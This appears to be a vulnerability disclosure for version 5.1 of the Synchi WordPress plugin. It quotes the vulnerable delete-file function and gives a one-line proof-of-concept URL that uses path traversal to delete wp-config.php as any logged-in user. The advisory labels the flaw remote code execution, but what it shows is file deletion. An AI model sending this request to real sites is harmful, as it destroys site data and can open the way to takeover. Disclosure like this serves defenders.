Details
- Name : Synchi
- Version : 5.1
- Homepage : https://wordpress.org/plugins/synchi/
Type
- Remote Code Execution - RCE
Description
- Type user access: any user registered.
- $_REQUEST['filename'] is not escaped.
Code
Path: /wp-content/plugins/synchi/synchi.php
Line: 490
function synchi_action_delete_file()
{
// get filename
$filename = $_REQUEST['filename'];
if (is_dir($filename)) $success = synchi_delete_directory($filename);
else $success = unlink($filename);
if ($success) synchi_ajax_response(true);
else synchi_ajax_error("Unable to delete file/folder!");
}
Proof Concept
1 – Log in with any user.
2 - Access url:
http://target/wp-admin/?synchi_action&synchi_action=delete_file&filename=../wp-config.php
Results
wp-config deleted and restart the all system.
Note
Solution
Timeline
- Date Discovery : 11/22/2017
- Date Vendor Contact : 12/24/2017
- Date Publish :
- Date Resolution :